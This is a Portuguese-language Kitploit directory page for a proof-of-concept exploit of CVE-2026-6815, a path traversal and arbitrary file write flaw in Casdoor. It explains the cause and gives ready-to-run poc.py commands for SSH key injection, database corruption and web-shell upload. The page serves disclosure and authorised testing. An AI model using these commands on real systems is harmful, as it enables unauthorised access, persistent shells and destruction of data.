Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-6815 — Exploit de Prova de Conceito (PoC) para CVE-2026-6815: Authenticated Path Traversal & Arbitrary File Write no Casdoor (< 3.54.1) levando a RCE/DoS. | Kitploit
Ferramentas/GitHubGitHub/danilo-dellorco/cve-2026-6815
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

Exploit de Prova de Conceito (PoC) para CVE-2026-6815: Authenticated Path Traversal & Arbitrary File Write no Casdoor (< 3.54.1) levando a RCE/DoS.

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-6815 PoC/Exploit: Casdoor <3.54.1 Path Traversal & Escrita Arbitrária de Ficheiros (Autenticado)

Este repositório contém um exploit de Prova de Conceito (PoC) para CVE-2026-6815, uma vulnerabilidade de escrita arbitrária de ficheiros e path traversal no Casdoor.

A vulnerabilidade foi corrigida na versão 3.54.1.

Requisitos

O atacante deve estar autenticado na instância do Casdoor com privilégios de administrador ou utilizador equivalente com acesso para criar e/ou editar fornecedores de armazenamento.

Impacto

  • Execução Remota de Código (RCE): Ao escrever em locais sensíveis como .ssh/authorized_keys, crontabs ou webroots.
  • Negação de Serviço (DoS): Substituir bases de dados da aplicação (casdoor.db) ou binários principais com ficheiros arbitrários, interrompendo imediatamente a aplicação.

Detalhes Técnicos

O Casdoor permite que administradores configurem fornecedores de armazenamento. O fornecedor Local File System não consegue sanitizar adequadamente a configuração pathPrefix e o parâmetro fullFilePath durante o upload de recursos.

Ao usar sequências de navegação de diretórios (../), um administrador autenticado pode escapar do diretório de armazenamento dedicado e escrever ficheiros em qualquer lugar onde o processo do Casdoor tenha permissões.

A vulnerabilidade decorre de validação insuficiente de caminho em:

  • object/provider.go: Sem validação no pathPrefix durante criação/atualização.
  • storage/local_file_system.go: O método GetFullPath não verifica se o caminho resolvido permanece dentro da sandbox pretendida.

Utilização

  1. Instalar dependências:

    root@kitploit:~
    pip install -r requirements.txt
    
  2. Executar o exploit:

    root@kitploit:~
    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

Exemplos de Utilização

1. Injeção de Chave SSH para RCE

Escreva uma chave pública controlada pelo atacante no ficheiro authorized_keys do utilizador casdoor para obter acesso SSH.

Gerar a chave ssh:

root@kitploit:~
ssh-keygen -f casdoor_rce

Substituir authorized_keys pela chave pública gerada:

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

Obter shell ssh no host remoto usando a chave privada:

root@kitploit:~
ssh -i ./casdoor_rce casdoor@target

2. DoS Persistente (Corrupção da Base de Dados)

Substitua o ficheiro de base de dados local da aplicação (ex.: casdoor.db) para causar uma negação de serviço.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Upload de Web Shell (Webroot Secundário)

Se o servidor estiver a alojar um servidor web secundário (ex.: Apache/Nginx) no mesmo sistema de ficheiros, escreva uma web shell na sua raiz de documentos.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. Organização e Aplicação Personalizadas

Se tiver credenciais administrativas para uma organização e aplicação específicas (que não as predefinidas built-in e app-built-in), especifique-as usando --orgname e --appname.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

Referências

  • Nota de Vulnerabilidade CERT/CC VU#937808
  • CVE-2026-6815 no CVE.org
  • Aviso de Segurança Red Hat: CVE-2026-6815

Aviso Legal

Este software destina-se apenas a fins educativos e de testes de segurança autorizados. O autor não se responsabiliza por qualquer uso indevido desta informação.

Autor

Vulnerabilidade descoberta e PoC desenvolvida por Danilo Dell'Orco (sixpain).

Baixar ferramenta